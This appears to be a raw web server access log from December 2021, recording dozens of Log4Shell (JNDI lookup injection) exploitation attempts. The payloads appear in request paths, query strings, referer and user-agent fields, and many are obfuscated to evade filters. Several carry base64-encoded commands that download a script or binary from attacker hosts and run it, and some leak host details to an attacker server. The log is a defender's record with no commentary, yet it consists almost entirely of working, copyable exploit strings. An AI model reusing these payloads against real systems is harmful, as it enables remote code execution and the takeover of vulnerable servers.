95.214.235.219 - - [20/Dec/2021:09:33:24 +0000] "GET /api/v2/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
47.241.208.155 - - [20/Dec/2021:10:02:42 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
47.241.208.155 - - [20/Dec/2021:10:02:42 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
195.54.160.149 - - [20/Dec/2021:11:06:35 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
164.52.53.163 - - [20/Dec/2021:12:25:19 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
164.52.53.163 - - [20/Dec/2021:12:25:19 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
143.244.156.104 - - [20/Dec/2021:16:45:31 +0000] "GET / HTTP/1.1" 302 203 "${j${k8s:k5:-ND}i${sd:k5:-:}ldap://135.148.132.224:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}" "${j${k8s:k5:-ND}i${sd:k5:-:}ldap://135.148.132.224:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}"
211.154.194.21 - - [20/Dec/2021:17:57:38 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
211.154.194.21 - - [20/Dec/2021:17:57:39 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
147.182.202.30 - - [20/Dec/2021:18:56:53 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//135.148.132.224:1389/Basic/Command/Base64//d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//135.148.132.224:1389/Basic/Command/Base64//d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}')"
170.210.45.163 - - [20/Dec/2021:19:12:37 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [20/Dec/2021:19:12:37 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
150.158.95.54 - - [20/Dec/2021:19:47:54 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
150.158.95.54 - - [20/Dec/2021:19:47:54 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
195.54.160.149 - - [20/Dec/2021:20:40:20 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [20/Dec/2021:20:40:21 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
185.184.152.140 - - [21/Dec/2021:02:35:10 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
185.184.152.140 - - [21/Dec/2021:02:35:10 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
121.4.56.143 - - [21/Dec/2021:07:08:57 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
121.4.56.143 - - [21/Dec/2021:07:08:58 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
150.158.95.54 - - [21/Dec/2021:14:41:50 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
150.158.95.54 - - [21/Dec/2021:14:41:51 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
195.54.160.149 - - [21/Dec/2021:16:35:41 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [21/Dec/2021:16:35:41 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [22/Dec/2021:03:53:55 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
5.157.38.50 - - [22/Dec/2021:11:31:21 +0000] "GET /${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
5.157.38.50 - - [22/Dec/2021:11:31:21 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://142.93.172.227:1389/Exploit}"
5.157.38.50 - - [22/Dec/2021:11:31:23 +0000] "GET /?s=${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 200 96 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [22/Dec/2021:13:26:05 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [22/Dec/2021:13:26:06 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.146.165.168 - - [22/Dec/2021:14:09:42 +0000] "GET / HTTP/1.1" 302 203 "-" "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.165.168:1389/;;50.116.41.48--80;;${env:USERDOMAIN};;${env:COMPUTERNAME};;${java:os};;${sys:java.version};;}"
45.146.165.168 - - [22/Dec/2021:17:29:42 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.146.165.168:1389/;;50.116.41.48--80;;${env:USERDOMAIN};;${env:COMPUTERNAME};;${java:os};;${sys:java.version};;}"
195.54.160.149 - - [23/Dec/2021:09:50:33 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [23/Dec/2021:09:50:33 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
167.71.175.10 - - [23/Dec/2021:15:22:48 +0000] "GET /${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
167.71.175.10 - - [23/Dec/2021:15:22:48 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://142.93.172.227:1389/Exploit}"
167.71.175.10 - - [23/Dec/2021:15:22:48 +0000] "GET /?s=${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 200 96 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [23/Dec/2021:20:33:13 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
18.221.182.245 - - [24/Dec/2021:14:46:27 +0000] "GET / HTTP/1.1" 302 203 "${jnd${123%25ff:-${123%25ff:-i:}}ldap://135.148.130.60:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTguMjIyLjEyMi4yMjEvcmVhZGVyOyBjdXJsIC1PIGh0dHA6Ly8xOC4yMjIuMTIyLjIyMS9yZWFkZXI7IGNobW9kIDc3NyByZWFkZXI7IC4vcmVhZGVyIHJ1bm5lcg==}" "${jnd${123%25ff:-${123%25ff:-i:}}ldap://135.148.130.60:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTguMjIyLjEyMi4yMjEvcmVhZGVyOyBjdXJsIC1PIGh0dHA6Ly8xOC4yMjIuMTIyLjIyMS9yZWFkZXI7IGNobW9kIDc3NyByZWFkZXI7IC4vcmVhZGVyIHJ1bm5lcg==}"
195.54.160.149 - - [24/Dec/2021:17:12:08 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
170.210.45.163 - - [24/Dec/2021:23:52:40 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [24/Dec/2021:23:52:40 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
178.176.202.121 - - [25/Dec/2021:00:09:48 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 302 250 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
178.176.202.121 - - [25/Dec/2021:00:09:48 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
195.54.160.149 - - [25/Dec/2021:02:44:05 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [25/Dec/2021:02:44:05 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
163.172.54.124 - - [25/Dec/2021:03:18:07 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 302 250 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
163.172.54.124 - - [25/Dec/2021:03:18:07 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
199.195.250.77 - - [25/Dec/2021:11:25:09 +0000] "GET /?kicut=${jndi:ldap://50.116.41.48.c70g89jk9oedekoo8sugc8yoejayyyyyn.secresponstaskfrce.com/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
195.54.160.149 - - [25/Dec/2021:13:32:04 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [25/Dec/2021:23:03:06 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
